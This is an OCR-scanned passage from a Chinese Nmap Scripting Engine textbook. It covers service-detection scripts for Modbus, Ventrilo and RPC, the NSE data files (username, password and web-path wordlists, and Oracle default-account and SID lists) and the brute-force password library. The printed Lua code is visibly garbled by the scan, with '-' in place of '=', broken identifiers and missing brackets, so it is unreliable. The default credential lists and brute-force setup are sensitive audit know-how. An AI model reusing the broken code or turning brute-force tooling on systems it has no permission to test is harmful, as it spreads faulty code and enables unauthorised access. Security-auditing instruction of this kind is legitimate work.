O tcpwrapped 

O incomplete 


默认 的 值 是 hardmatched， 这 个 值 意味 着 扫描 结果 的 准确 率 是 100%。 
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12.3 ”服务 发 现 脚本 的 实例 
现在 简单 介绍 一 些 不 同 的 NSE 服务 发 现 脚本 ， 以 便 熟 悉 脚本 的 结构 。 


12.3.1 modbus-discover 


这 是 一 个 利用 modbus 协议 来 获取 设备 信息 的 脚本 。modbus 是 一 个 在 Supervisory 
Control And Data Acquisition (SCADA) 系统 中 常见 的 协议 。 这 个 脚本 会 收集 目标 系统 的 
Slave IDs (SID) 以 及 其 他 的 设备 信息 。 具 体 脚 本 内 容 如 下 。 


action = function(host, port) 
-- If false, stop after first sid. 
local aggressive = stdNSE.get script args('modbus-discover.aggressive') 


local opts = (timeout-2000] 
local results = {} 


for sid - 1, 246 do 
StdNSE.print debug(3, "Sending command with sid - $d", sid) 


local rsid = form rsid(sid, 0x11, "") 


local status, result = comm.exchange (host, port, rsid, opts 


if ( status and (#result »- 8) ) then 

local ret code - string.byte(result, 8) 

if ( ret code == (0x11) or ret code == (0x11 + 128) ) then 
local sid table ü 





if ret code == (0x11) then 
table.iNSErt(results, ("Positive respoNSE for sid = Ox$x"):format(sid)) 
local slave id = extract slave id(result 


if ( slave id -- nil ) then table.iNSErt(sid table, "SLAVE ID DATA: 
"..slave id) end 
elseif ret code == (0x11 + 128) then 


local exception code - string.byte(result, 9) 
local exception string - modbus exception codes[exception code] 
nil ) then exception string - "UNKNOWN 





if ( exception string = 
EXCEPTION" end 


table.iNSErt(results, ("Positive error respoNSE for sid = Ox$x 
($s)"):format(sid, exception string)) 
end 


local device table - discover device id(host, port, sid) 

if ( #device table > 0 ) then 

table.iNSErt(sid table, form device id string(device table)) 
end 

if ( #sid table > 0 ) then 

table.iNSErt(results, sid table) 

end 

if ( not aggressive ) then break end 
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end 

end 

end 

if ( #results > 0 ) then 

port.state = "open" 

port.version.name - "modbus" 
nmap.set port version(host, port) 

end 

return stdNSE.format output(true, results) 
end 

当 打开 上 面 的 脚本 之 后 ,第 一 眼看 到 的 就 是 这 个 脚本 的 分 类 。 
categories = {"discovery", "intrusive"} 

接 下 来 可 以 看 到 执行 的 规则 。 


portrule = shortport.portnumber(502, "tcp") 
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这 个 脚本 并 不 属于 version 类 别 ， 但 是 通过 这 个 例子 ， 却 可 以 看 到 任何 脚本 都 可 以 通过 
Nmap API 来 更 新 端口 版 本 的 信息 。 这 个 脚本 继续 检测 过 程 。 最 后 它 将 会 轻松 地 利用 Nmap. 


set port version() 函数 更 新 目标 端口 的 状态 和 版 本 的 信息 。 


if ( #results > 0 ) then 
port.state - "open" 
port.version.name - "modbus" 
Nmap.set port version(host, port) 


end 
这 个 脚本 执行 的 结果 如 下 所 示 。 
PORT STATE SERVICE 


502/tcp open modbus 

| modbus-discover: 

| Positive respoNSE for sid = 0x64 

| SLAVE ID DATA: \xFA\xFFPM710PowerMeter 

l DEVICE IDENTIFICATION: Schneider Electric PM710 v03.110 
l 


_ Positive error respoNSE for sid = 0x96 (GATEWAY TARGET DEVICE FAILED TO RESPONSE) 


12.3.2 ventrilo-info 


脚本 ventrilo-info 是 用 来 检测 当前 比较 流行 的 Ventrilo 语音 交流 服务 器 ， 并 获取 有 用 的 


信息 ， 例 如 操作 系统 信息 等 。 这 是 Nmap 中 自 带 的 一 个 版 本 检测 脚本 。 
打开 这 个 脚本 的 源码 ， 可 以 查看 到 它 的 执行 规则 。 


portrule = shortport.version port or service((3784), "ventrilo", ("tcp", 





"udp"]) 


在 完成 对 服务 和 配置 的 检测 之 后 ， 这 个 脚本 将 会 设置 对 应 的 端口 版 本 字段 并 更 新 端口 


table。 


-- parse the received data string into an output table 
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local info = o table(fulldata str 
port.version.name - "ventrilo" 
port.version.name confidence - 10 
port.version.product - "Ventrilo" 
port.version.version - info.version 
port.version.ostype - info.platform 
port.version.extrainfo - "; name: ".. info.name 
"tcp" then 





if port.protocol =: 





port.version.extrainfo = "voice port" .. port.version.extrainfo 

else 

port.version.extrainfo - "status port" .. port.version.extrainfo 

end 

port.version.extrainfo - port.version.extrainfo .. "; uptime: " .. 

uptime str(info.uptime) 

port.version.extrainfo - port.version.extrainfo .. "; auth: " .. auth str(info.auth 


Nmap.set port version(host, port, "hardmatched") 


这 一 次 设置 匹配 的 结果 为 hardmatched， 因 为 可 以 百 分 之 一 百 地 确信 目标 是 一 个 
Ventrilo servers 


这 个 脚本 在 对 一 个 Ventrilo server 扫描 之 后 的 结果 如 下 所 示 。 


PORT STATE SERVICE VERSION 

9408/tcp open ventrilo Ventrilo 3.0.3.C (voice port; 
name: TypeFrag.com; uptime: 152h:56m; 

auth: pw) 


| ventrilo-info: 

| name: TypeFrag.com 

| phonetic: Type Frag Dot Com 

| comment: http://www.typefrag.com/ 

| auth: pw 

| max. clients: 100 

| voice codec: 3,Speex 

| voice format: 32,32 KHz$2C 16 bit$2C 10 Qlty 
| uptime: 152h:56m 

| platform: WIN32 

| version: 3.0.3.C 

| channel count: 14 

| channel fields: CID, PID, PROT, NAME, COMM 
| client count: 6 

| client fields: ADMIN, CID, PHAN, PING, SEC, NAME, COMM 

| channels: 

| «top level lobby» (CID: 0, PID: n/a, PROT: n/a, COMM: n/a): «empty» 
| Group 1 (CID: 719, PID: 0, PROT: 0, COMM: ): 

| stabya (ADMIN: 0, PHAN: 0, PING: 47, SEC: 206304, COMM: 

| 

| 

| 

| 

| 

| 


Group 2 (CID: 720, PID: 0, PROT: 0, COMM: ): «empty» 
Group 3 (CID: 721, PID: 0, PROT: 0, COMM: ): «empty» 
Group 4 (CID: 722, PID: 0, PROT: 0, COMM: ): «empty» 


Group 5 (CID: 723, PID: 0, PROT: 0, COMM: ): 
Sir Master Win (ADMIN: 0, PHAN: 0, PING: 32, SEC: 186890, COMM: 
waterbukk (ADMIN: 0, PHAN: 0, PING: 31, SEC: 111387, COMM: 
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likez (ADMIN: 0, PHAN: 0, PING: 140, SEC: 22457, COMM: 
Tweet (ADMIN: 0, PHAN: 0, PING: 140, SEC: 21009, COMM: 


Group 6 (CID: 724, PID: 0, PROT: 0, COMM: ): <empty> 
Raid (CID: 725, PID: 0, PROT: 0, COMM: ): <empty> 
Officers (CID: 726, PID: 0, PROT: 1, COMM: ): <empty> 








Rated R (CID: 728, PID: 0, PROT: 0, <empty> 
Group 7 (CID: 729, PID: 0, PROT: 0, <empty> 
Group 8 (CID: 730, PID: 0, PROT: 0, <empty> 
Group 9 (CID: 731, PID: 0, PROT: 0, <empty> 


AFK - switch to this when AFK (CID: 732, PID: 0, PROT: 0, COMM: ): 
_ Eisennacher (ADMIN: 0, PHAN: 0, PING: 79, SEC: 181948, COMM: 


1 

1 

l 

1 

l ; 
| PG 13 (CID: 727, PID: 0, PROT: 0, COMM: ): «empty» 
l $ 
| 

1 

l 

| 

l 


Service Info: OS: WIN32 


12.3.3 rpc-grind 


脚本 rpc-grind 用 来 侦 测 目 标的 服务 名 字 、RPC 编号 和 版 本 。 
接 下 来 看 这 个 脚本 中 的 portrule。 


portrule = function(host, port 





Do not run for excluded ports 

if (Nmap.port is excluded(port.number, port.protocol)) 
return false 

end 


then 


if port.service -- nil and port.version.service dtype -- "table" and port. 


service --'rpcbind' then 

-- Exclude services that have already been detected as 
different than rpcbind. 

return false 

end 

return true 





end 


something 
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这 个 脚本 向 Nmap-rpc 文件 中 列 出 的 RPC 程序 编号 发 送 RPC 调用 请 求 。 在 对 所 有 的 回 


应 进行 处 理 之 后 ， 它 会 检查 结果 ， 并 更 新 端口 信息 。 


if #result > 0 then 
port.version.name - result.program 


port.version.extrainfo = "RPC #" .. result.number 

if result.highver -- result.lowver then 
port.version.version = ("$s-$s"):format(result.lowver, 
else 


port.version.version - result.highver 

end 

nmap.set port version(host, port, "hardmatched") 
else 


result.highver) 


StdNSE.print debug("Couldn't determine the target RPC service. 


Running a service not in Nmap-rpc ?") 
end 
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如 果 检 测 到 一 个 RPC 服务 ， 将 输出 如 下 内 容 。 


PORT STATE SERVICE VERSION 
53344/udp open walld (walld V1) 1 (RPC #100008) 
小 结 


在 这 一 章 中 ， 学 习 了 Nmap 中 对 于 服务 发 现 的 工作 过 程 ， 包 括 它 的 各 个 阶段 、 数 据 结构 
等 。 同 时 也 完成 了 对 modbus-discover、ventrilo-info 和 rpc-grind 几 个 脚本 的 编写 。 现 在 已 经 
能 够 胜任 Nmap 中 事先 不 存在 软件 的 版 本 检测 工作 了 。 你 最 好 试 着 编写 一 个 常见 的 软件 版 本 
的 检测 工具 ， 这 样 可 以 更 好 地 掌握 这 项 的 技术 。 


CHAPTER 


第 13 章 
NSE 中 的 数据 文件 13 


在 进行 网 络 扫描 和 审计 过 程 中 ， 有 时 会 使 用 到 数据 文件 。 例 如 ， 当 尝试 测试 一 个 Web 登 
录 功 能 的 密码 强壮 性 的 时 候 ， 就 需要 一 个 包含 了 大 量 用 户 名 的 文件 和 一 个 包含 了 大 量 密码 的 
文件 ， 然 后 逐个 配对 进行 测试 。 

另外 在 对 目标 服务 器 进行 服务 和 操作 系统 扫描 的 时 候 ， 也 需要 一 个 数据 文件 来 存储 常见 
服务 和 操作 系统 的 指纹 信息 文件 。 

在 Nmap 安装 的 时 候 ， 这 些 数据 文件 就 已 经 被 安装 到 系统 之 中 ， 但 需要 注意 的 是 ， 这 些 
数据 文件 都 是 最 基本 的 。 我 们 都 知道 在 测试 用 户 名 和 密码 的 时 候 ， 绝 对 是 词 库 包 含 的 内 容 越 
多 ， 效 果 越 好 ， 但 是 考虑 到 文件 的 大 小 ，Nmap 中 并 没有 提供 特别 大 的 数据 文件 。 

因此 ， 在 实际 的 应 用 情形 中 ， 如 果 要 取得 良好 的 扫描 和 审计 效果 ， 应 当 考 虑 使 用 更 
为 全 面 的 数据 文件 来 代替 Nmap 中 自 带 的 文件 。 现 在 了 解 一 下 NSE 中 的 一 些 重要 的 数据 
文件 。 

在 这 一 章 中 将 会 了 解 以 下 内 容 。 

口 Nmap 中 的 数据 目录 。 

口 用 户 名 和 密码 数据 文件 。 

Q Web 应 用 审计 数据 文件 。 

口 数据 库 管 理 系统 (DBMS) 审计 数据 文件 。 





e 
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13.1 Nmap 中 数据 文件 所 在 的 位 置 


首先 确认 一 下 Nmap 中 这 些 数 据 文件 的 位 置 ， 需 要 注意 的 是 ， 这 些 位 置 由 于 操作 系统 不 
同 而 不 同 。 

例如 ， 在 Windows 操作 系统 中 ， 这 些 文件 都 在 C:\Program Files\Nmap\NSElib\data 文件 
夹 中 ，64 位 系统 稍 有 不 同 。 

TE Linux 系列 操作 系统 中 ， 这 些 文件 在 /usr/local/share/Nmap/NSElib/data 和 /usr/share/ 
Nmap/ selib/data 中 。 

Nmap 在 执行 时 有 一 个 --datadir 选项 ， 在 扫描 中 使 用 这 个 选项 就 可 以 指定 数据 目录 的 所 
在 位 置 ， 具 体 命令 如 下 。 


$Nmap --datadir /usr/local/Nmap-data/ -sC -sV «target» 


13.2. Nmap 中 选择 数据 文件 的 顺序 


NSE 会 自动 地 从 指定 位 置 读 取 数 据 文件 ， 当 多 个 目录 中 都 存在 数据 文件 时 ，NAMP 选择 
的 优先 级 别 如 下 。 

口 优先 级 1: 选项 --datadir 所 指定 的 目录 。 

口 优先 级 2: 环境 变量 中 指定 的 位 置 。 

口 优先 级 3: 安装 目录 。 

口 优先 级 4: 在 编译 时 定义 的 目录 。 


13.3 ”暴力 穷 举 时 所 使 用 的 用 户 名 和 密码 列表 数据 文件 


很 多 服务 都 使 用 了 用 户 名 和 密码 进行 验证 。 在 对 服务 进行 密码 强壮 度 审计 的 时 候 ， 需 要 
使 用 到 两 个 数据 文件 ， 一 个 存储 了 大 量 的 用 户 名 ， 一 个 存储 了 大 量 的 密码 。Nmap 中 提供 了 
这 样 的 两 个 文件 ， 但 是 考虑 到 Nmap 的 安装 文件 不 宜 过 大 ， 因 此 这 两 个 文件 中 包含 的 内 容 并 
不 多 。 其 中 保存 了 常见 用 户 名 的 文件 usernames.lst 只 有 72 个 字 节 (不 到 1KB), 保存 了 常见 
密码 的 文件 passwords.lst 大 小 只 有 46KB。 














13.3.1 用 户 名 数据 文件 
usernames.lst 中 的 内 容 十 分 简单 ， 打 开 这 个 文件 ， 可 以 看 到 只 包含 如 下 内 容 。 


root 
admin 
administrator 
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webadmin 
sysadmin 
netadmin 
guest 
user 

web 

test 


上 面 给 出 的 这 些 用 户 名 只 是 很 少 的 一 部 分 ， 例 如 经 常 使 用 的 MS SQL 数据 库 默 认 的 管 
理 员 账 户 sa 就 不 在 其 中 ， 如 果 对 这 个 数据 文件 不 加 修改 就 直接 使 用 的 话 ， 是 无 法 完成 对 MS 
SQL 数据 库 用 户 名 密码 强壮 度 的 审计 工作 的 。 

互联 网 上 有 大 量 优秀 的 字典 可 以 下 载 ， 这 些 字典 有 的 大 小 甚至 达到 以 GB 为 单位 。 另 外 
一 些 专用 的 密码 生成 器 也 是 不 错 的 选择 。 


13.3.2 ”密码 数据 文件 


passwords.lst 中 的 内 容 要 丰富 一 些 ， 大 概 包含 了 5000 多 个 常见 的 词汇 和 字母 组 合 ， 
但 是 要 注意 这 个 文件 主要 针对 的 是 英文 ， 其 中 大 多 数 密码 并 不 是 使 用 汉语 的 人 所 常用 的 。 

同样 ， 使 用 这 个 默认 词典 的 成 功率 不 会 很 高 ， 因 此 这 里 在 对 服务 进行 审计 的 时 候 ， 建 议 
使 用 一 个 专业 而 强大 的 词典 文件 。 





13.4 Web 应 用 审计 数据 文件 


Nmap 在 对 Web 应 用 的 扫描 方面 是 十 分 强大 的 ， 这 些 扫描 中 往往 也 要 用 到 一 些 数据 文 
件 。 下 面 来 看 一 下 在 Web 安全 应 用 审计 方面 都 需要 使 用 到 哪些 数据 文件 。 


13.4.1 http-fingerprints.lua 


这 个 文件 是 一 个 Lua table 形式 保存 的 数据 文件 ， 在 这 个 文件 中 包含 了 一 些 常 见 Web p 
用 的 信息 ， 这 些 信息 包括 这 些 应 用 中 关键 文件 所 在 的 位 置 。 

Nmap 中 专门 用 来 对 Web 应 用 的 未 隐藏 的 文件 进行 枚 举 的 脚本 http-enum 就 使 用 了 这 个 
数据 文件 。 

http-fingerprints.lua 文件 中 的 内 容 如 下 所 示 。 


table.iNSErt (fingerprints, ( 
category='cms', 

probes={ 
{path='/changelog.txt'}, 
{path='/tinymce/changelog.txt'}, 
) 


matches-( 


E 
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(match-'Version (.-) ', output-'Version \\1'}, 
(output-'Interesting, a changelog.') 

) 

H) 


Nmap 允许 对 http-fingerprints.lua 文件 进行 扩充 ， 可 以 随时 将 一 个 新 的 Web 应 用 文件 的 
信息 添加 到 这 个 table 文件 中 。 

另外 ， 如 果 希 望 在 http-enum 脚本 执行 的 时 候 使 用 其 他 的 数据 文件 ， 也 可 以 在 执行 的 时 
候 使 用 参数 --script-args http-enum.fingerprintfile 来 指定 。 例 如 要 使 用 ./myfingerprints.txt 就 可 
以 执行 如 下 命令 。 

Nmap --script http-enum --script-args http-enum.fingerprintfile=./myfingerprints. 


txt -p80<target> 


13.4.2 http-sql-errors.lst 


这 个 数据 文件 中 包含 了 一 些 标识 错误 的 字符 串 ， 这 个 数据 文件 主要 被 脚本 http-sql- 
injection 所 使 用 。 用 来 完成 对 应 用 是 否 能 够 抵御 SQL 注入 进行 检测 。 这 个 文件 中 一 共 包含 了 
339 个 字符 串 。 

同样 也 可 以 使 用 参数 http-sql-injection.errorstrings 来 改变 这 个 脚本 执行 时 所 使 用 的 数据 
文件 。 


--script-args http-sql-injection.errorstrings-/home/user/fuzzin/errors.txt 








13.4.3 http-web-files-extensions.Ist 


NSE 中 的 http-spider 库 文件 在 对 页 面 进行 扫描 的 过 程 中 就 会 使 用 该 文件 。 这 个 文件 中 包 
AT 200 多 个 常见 的 Web 应 用 扩展 名 ， 也 可 以 很 容易 地 将 另外 一 些 Web 应 用 扩展 名 添加 到 
这 个 文件 中 。 下 面 给 出 了 这 个 文件 的 一 部 分 。 

vsdisco 

wbxml 

wdgt 

web 

webarchive 

webbookmark 

webhistory 

webloc 

website 

webz 

wgp 

wgt 

whtt 

widget 

wml 
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13.4.4 http-devframework-fingerprints.lua 


这 个 数据 文件 由 Lua table 所 构成 ， 被 脚本 http-devframework 所 调用 ， 目 的 是 检测 目标 
Web 应 用 的 开发 语言 ， 例 如 ASP、PHP 等 。 这 个 table 中 的 每 一 项 都 包含 了 如 下 字段 。 

口 Name: 开发 环境 的 描述 性 名 称 。 

口 RapidDetect: 在 检测 过 程 开 始 执行 的 回调 函数 。 

口 consumingDetect: 一 个 在 疏 虫 页 面 执 行 的 回调 函数 。 

例如 ， 对 ASP.NET 开发 语言 的 检测 函数 如 下 所 示 。 


ASPdotNET = ( rapidDetect = function(host, port) 
respoNSE - http.get(host, port, "/") 

-- Look for an ASP.NET header. 
for h, v in pairs(respoNSE.header) do 
vl = v:lower() 
if h "x-aspnet-version" or string.find(vl, "asp") then 
return "ASP.NET detected. Found related header." 

















end 
end 
if respoNSE.cookies then 
for , c in pairs(respoNSE.cookies) do 
if c.name -- "aspnetsessionid" then 
return "ASP.NET detected. Found aspnetsessionid cookie." 
end 
end 
end 


end, 
consumingDetect - function(page, path) 
-- Check the source and look for common traces. 
if page then 
if string.find(page, " _ VIEWSTATE") or 
string.find(page, " EVENT") or 
string.find(page, "  doPostBack") or 
string.find(page, "aspnetForm") or 
string.find(page, "ctl100 ") then 
return "ASP.NET detected. Found common traces on" ..path 
end 
end 
end 


13.4.5 http-folders.txt 


这 个 数据 文件 中 包含 了 956 个 HTTP 中 常见 的 目录 名 ， 被 脚本 http-iis-webdav-vuln 所 调 
用 ， 用 来 检测 IIS 5.1/6.0 类 型 服务 器 上 的 漏洞 。 这 个 文件 的 部 分 内 容 如 下 。 


/admin-bak/ 
/Admin files/ 
/administration/ 
/administrator/ 
/admin-old/ 
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/adminuser/ 
/adminweb/ 
/adminWeb/ 
/admisapi/ 
/AdvWebAdmin/ 
/Agent/ 
/agentes/ 
/Agents/ 
/Album/ 
/AlbumArt/ 
/AlbumArt / 
/allow/ 
/analog/ 


同样 ， 如 果 不 想 使 用 这 个 数据 文件 ， 也 可 以 使 用 参数 --script-args folderdb 来 指定 其 他 的 
数据 文件 ， 例 如 使 用 /pentest/fuzzers/folders.txt 作为 这 个 目录 。 


--script-args folderdb-/pentest/fuzzers/folders.txt «target» 


13.4.6 vhosts-default.Ist 


脚本 http-vhosts 就 是 用 这 个 数据 文件 来 判断 目标 服务 器 到 底 是 一 个 虚拟 机 还 是 一 个 真正 
的 Web 服务 器 。 这 个 文件 的 部 分 内 容 如 下 。 


admin 
administration 





ads 
adserver 
alerts 
alpha 

ap 
apache 
app 

apps 
appserver 
aptest 
auth 
backup 
beta 
blog 

cdn 

chat 
citrix 


13.4.7 wp-plugins.Ist 


这 个 文件 中 包含 了 18 575 个 常见 的 WordPress 插件 的 名 称 ， 脚 本 http-wordpress-plugins 
就 是 利用 这 个 文件 来 对 采用 WordPress 建站 的 服务 器 进行 暴力 穷 举 攻击 。 需 要 注意 的 是 ， 如 
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果 http-wordpress-plugins 脚本 中 不 特殊 指定 --script-args http-wordpress-plugins.search， 这 个 
脚本 只 会 读 取 前 100 个 插件 名 。 


akismet 

contact-form-7 
all-in-one-seo-pack 
google-sitemap-generator 
wordpress-seo 

jetpack 

nextgen-gallery 
wordpress-importer 
google-analytics-for-wordpress 
wp-super-cache 

wptouch 

si-contact-form 
wp-pagenavi 

woocommerce 
tinymce-advanced 
w3-total-cache 

wordfence 
google-analyticator 


13.5 DBMS-auditing 数据 文件 


某 些 与 数据 库 管理 系统 (DBMS) 相关 的 脚本 要 使 用 数据 文件 来 存储 常见 的 相关 字符 串 
和 指纹 文件 来 完成 安全 审计 。 


13.5.1 mysql-cis.audit 


这 个 文件 位 于 Nmap 的 安装 目录 中 ， 主 要 根据 CIS MySQL v1.0.2 benchmark 来 检测 
MySQL 数据 库 的 配置 安全 性 。NSE 中 有 一 个 mysql-audit 脚本 就 是 使 用 了 这 个 文件 ， 这 个 文 
件 中 的 内 容 如 图 13-1 所 示 。 


38 kest [id-'3.l, descr Skip syabolic links, sql- SHOV variables WHERE Variable rame = "log error AND Value IS NOT NULL', check-function(rowstab] 
49 | return {status = nct (isEmpty (rowstab[1])) } 

50 end 

5 





53 test [id-^3.2", desc-'Logs no: on system partiticn, sql="SHOW variables WHERE Variable name = "log bir! AND Value <> "OFF'", check-function (rowstab) 
54 | local log = col?tab(rowstab[ll, ^ Value) 

SS | return [status = isEmpty(rowstab[1]), result = log, review = not (isEmpty (rowstab[1])) ] 

56 end 

LA 


58 test [id-/3.2", desc-'Logs not on database partition’, sql- SHOW variables WHERE Variable name = "log bim' AND Value <) ^OFF'", check-functien(rowstab) 
60 | local log = col2tab(rowstab[l], "Value') 

6t return { status = isEmpty(rowstab[1]), result = log, review = not (isEmpty(rowstab[1])) } 

62 end 

EA 











13-1 mysql-cis.audit 的 内 容 
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13.5.2 oracle-default-accounts.Ist 


这 个 文件 中 包含 了 687 个 Oracle 数据 库 中 用 来 验证 的 用 户 名 。 这 个 文件 被 oracle-brute 
和 oracle-brute-stealth 两 个 脚本 所 调用 。 这 个 文件 的 内 容 格式 如 图 13-2 所 示 。 





T 
2 gicomment: Ihis password file was created from the hashes in dfltpass.sql a 
3 #lcomment: script created by Oracle to scan databases for default credentials. 
4 AASH/AASH 

5 ABAI/ABAL 

6 ABM/ABM 

7 AD MONIIOR/LIZARD 

8 ADANS/WOOD 

9 ADS/ADS 

ho ADSEUL US/WELCOME 

|i AHL/AHL 

h2 ABUAN 

3 AK/AK 

|4 AL/AL 

S ALAL/ALAI 

he ALLUSERS/ALLUSERS 

h7 ALR/ALR 

8 ANAL/AMAI 

h9 ANA2/AMA2 








图 13-2 oracle-default-accounts.Ist 中 的 内 容 


如 果 需 要 使 用 其 他 文件 ， 可 以 通过 --script-args userdb=/pentest/users.txt 进行 修改 。 














13.5.3 oracle-sids 


文件 oracle-sids 包含 了 700 个 常见 的 Oracle 数据 库 实 例 名 ， 这 个 文件 被 脚本 oracle-sid- 
brute 调用 。 这 个 文件 的 内 容 格 式 如 图 13-3 所 示 。 





5 ORCL 

6 XE 

7 ASDB 

8 IASDB 

9 OEMREP 

10 ORCL.WORLD 
11 ADVI 

12 ADVCPROD 
13 AIX10 

14 AIX11 

15 AIX9 

16 APEX 

17 ARIS 

18 ASDBO 

19 ASDBI 

20 ASDB2 

21 ASDB3 

22 ASDB4 

23 ASDBS 











图 13-3 oracle-sids 中 的 内 容 
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在 Nmap 中 还 有 一 些 不 常 使 用 的 数据 文件 ， 这 里 限于 篇 幅 不 再 一 一 介绍 。 





小 结 


在 这 一 章 中 ,介绍 了 NSE 中 所 使 用 的 各 种 不 同 的 数据 文件 。 另 外 也 了 解 了 在 扫描 过 程 
中 使 用 自 定 义 文件 的 重要 性 。 从 现在 开始 起 ， 可 以 根据 扫描 条 件 的 不 同 对 扫描 进行 自 定义 ， 
以 提高 扫描 的 效率 。 另 外 在 日 常 工作 中 也 可 以 多 注意 常见 的 用 户 名 、 密 码 或 者 一 些 文件 名 。 


CHAPTER 
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NSE 中 一 个 重要 的 功能 就 是 对 各 种 服务 、 应 用 、 协 议 的 密码 强度 进行 审计 。 如 果 你 有 一 
些 安全 渗透 的 经 验 ， 就 会 十 分 清楚 弱 口 令 在 IT 环境 中 的 存在 是 一 种 多 么 普遍 的 现象 。 但 是 
对 整个 网 络 中 弱 口 令 这 种 情况 进行 手动 检测 几乎 是 一 件 不 可 能 完成 的 事情 。 你 会 被 同事 们 
违规 设置 弱 口 令 这 件 事 情 弄 得 精 疲 力 尽 ， 但 是 却 毫 无 办 法 来 避免 这 件 事情 。 不 过 目前 Nmap 
中 已 经 包含 了 超过 50 种 弱 口 令 检 测 脚本 ， 这 些 脚 本 主要 针对 以 下 这 些 应 用 、 服 务 以 及 协议 
方面 。 

Q HTTP, HTTPS 以 及 一 些 Web 应 用 。 

O SMTP, POP 以 及 IMAP 等 邮件 投递 的 应 用 

口 Oracle、IBM DB2、MySQL、MS SQL 等 常见 数据 库 。 

口 源码 控制 系统 SVN 和 CVS。 

O 一些 特殊 的 协议 ,例如 SIP, VMWare Authorization, 

在 这 一 章 中 ， 将 会 学 习 如 下 主题 。 

口 如 何在 NSE 中 调整 执行 的 模式 和 路 径 。 

O 如 何在 brute 库 文件 中 实现 Driver 类。 

口 如 何 调整 brute 引擎 的 行为 。 

口 如 何 使 用 username 和 password 数据 库 。 

T 如 何在 脚本 中 对 登录 凭证 进行 管理 。 
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14.1 使 用 NSE 库 进 行 工 作 


brute 是 NSE 中 一 个 用 来 实现 对 密码 进行 暴力 破解 的 库 文件 。 在 脚本 中 使 用 这 个 
可 以 提高 密码 破解 的 执行 效率 。 在 脚本 中 采用 这 个 库 文件 以 后 ， 就 可 以 实现 并 行 化 登 





库 文件 
KAZI 


操作 。 这 个 库 文件 支持 多 种 不 同 的 执行 模式 ， 这 样 就 可 以 灵活 地 改变 用 户 名 和 密码 的 组 合 方 
式 。Brute 还 可 以 对 不 完整 的 登录 进行 处 理 ， 然 后 将 这 些 用 户 名 和 密码 重新 添加 到 登录 队列 
里 。 另 外 Brute 这 个 库 也 经 常 和 creds 库 协 同 工 作 。 它 还 可 以 对 扫描 过 程 中 取得 成 功 的 用 户 名 
和 密码 进行 保存 ， 以 便 各 个 脚本 共享 。 总 之 ， 这 是 一 个 功能 非常 强大 的 库 ， 利 用 这 个 库 可 以 


轻松 地 开发 出 暴力 破解 密码 的 脚本 。 
brute NSE 库 中 定义 如 下 4 个 类 。 
口 Account 
O Engine 
O Options 
O Error 


从 这 些 类 的 名 字 中 就 可 以 看 出 它们 的 用 途 ， 先 来 看 看 这 些 类 的 实现 细节 。 一 个 调用 了 
brute 库 的 NSE 脚本 需要 向 Engine 类 传递 一 个 包含 host、port 以 及 option 的 Lua table; ? 


Engine 类 启动 以 后 ， 在 每 一 次 登录 时 都 会 产生 一 个 Driver 类 的 实例 。 
下 面 使 用 brute.Engine:new0 方法 来 创建 一 个 Engine 类 的 实例 。 


brute.Engine:new (Driver, host, port, options) 


下 面 的 代码 给 出 了 brute.Engine 类 的 实例 化 ， 以 及 展开 攻击 的 过 程 。 


local status, result, engine 

engine = brute.Engine:new (Driver, host, port, options) 
engine:setMaxThreads (thread num) 
engine.options.script name - SCRIPT NAME 

Status, result - engine:start() 


接 下 来 学 习 一 下 如 何 完成 NSE brute 脚本 的 核心 





Driver 类 的 实现 。 


14.1.1 NSE 中 brute 模式 的 设 定 





Brute 中 存在 多 种 执行 模式 ， 这 些 模式 决定 了 如 何 对 用 户 名 字典 和 密码 字典 进行 组 合 。 


这 个 模式 的 设 定 是 可 选 的 ， 不 过 在 大 多 数 时 候 默 认 值 就 可 以 正常 工作 。 
Brute 库 中 支持 三 种 不 同 的 模式 。 
Q User 模式 
Q Pass 模式 
Q Creds 模式 
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这 里 举例 说 明 下 这 三 种 模式 。 例 如 ， 有 一 个 用 户 名 的 列表 ， 内 容 如 下 。 


Admin 
Root 


还 有 一 个 密码 的 列表 ， 内 容 如 下 。 


Test 





Rdmin 


如 果 现 在 选择 User 模式 ，Engine 将 会 尝试 对 用 户 名 列表 中 的 每 个 用 户 名 匹配 所 有 的 密 
也 就 是 说 先 将 一 个 用 户 名 与 所 有 的 密码 组 合 测试 完 ， 再 测试 下 一 个 用 户 名 。 按 照 这 个 模 


式 的 话 ， 产 生 的 登录 组 合 形式 如 下 。 


admin:test 
admin:admin 
root:test 
root:admin 


在 Pass 模式 中 ，Engine 将 会 尝试 对 密码 列表 中 的 每 个 密码 匹配 所 有 的 用 户 名 ， 也 就 是 





说 测试 的 顺序 是 先 将 一 个 密码 与 所 有 的 用 户 名 组 合 测试 完 ， 再 测试 下 一 个 密码 。 按 照 这 个 模 


式 ， 


产生 的 登录 组 合 形式 如 下 。 
admin:test 

root:test 

admin:admin 

root:admin 


最 后 的 Creds 模式 可 以 在 文件 中 读 取 一 些 密码 和 用 户 名 的 组 合 ， 然 后 进行 登录 。 这 个 文 


件 可 以 在 参数 中 指定 。 文 件 中 的 用 户 名 和 密码 的 格式 按照 如 下 格式 。 


admin/admin 
admin/12345 
admin/ 


用 户 名 和 密码 写 在 同一 行 ， 中 间 用 “/” 隔 开 。 

默认 情况 下 ，Nmap 采用 的 都 是 Pass 模式 。 

也 可 以 单独 地 使 用 参数 指定 这 些 。 

--script-args brute.mode-creds,brute.credfile-/home/pentest/commoncreds.txt «target» 


也 可 以 使 用 userdb 和 passdb 来 更 改 用 户 名 和 密码 文件 这 两 个 参数 ， 例 如 下 面 的 语句 。 


--script-args userdb-/home/pentest/users.txt,passdb-/home/pentest/top500.txt «target» 

















14.1.2. NSE 中 Driver 类 的 实现 


brute.Engine 会 在 每 次 登录 时 都 产生 一 个 Driver 类 的 实例 。 在 这 个 类 中 需要 定义 的 函数 


包括 如 下 内 容 。 
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O Driver:login() 

O Driver:connect() 

O Driver:disconnect() 

函数 Driver:login() 中 存储 了 使 用 指定 用 户 名 和 密码 登录 到 目标 的 逻辑 。 这 个 函数 应 该 包 
含 两 个 返回 值 : 一 个 布尔 类 型 的 值 ， 这 个 值 指示 了 登录 操作 状态 ; 另 一 个 值 取决 于 这 个 状态 ， 
如 果 登 录 成 功 的 话 ， 返 回 的 就 是 一 个 账户 ， 如 果 登 录 失 败 的 话 ， 返 回 的 就 是 一 个 错误 对 象 。 

函数 Driver:connect() 中 用 来 处 理 和 目标 建立 连接 任务 相关 的 操作 。 例 如 创建 网 络 socket 
套 接 字 、 检 测 目 标 是 否 在 线 、 是 否 有 回应 等 。 这 个 方法 在 Driver:login0 之 前 执行 。 

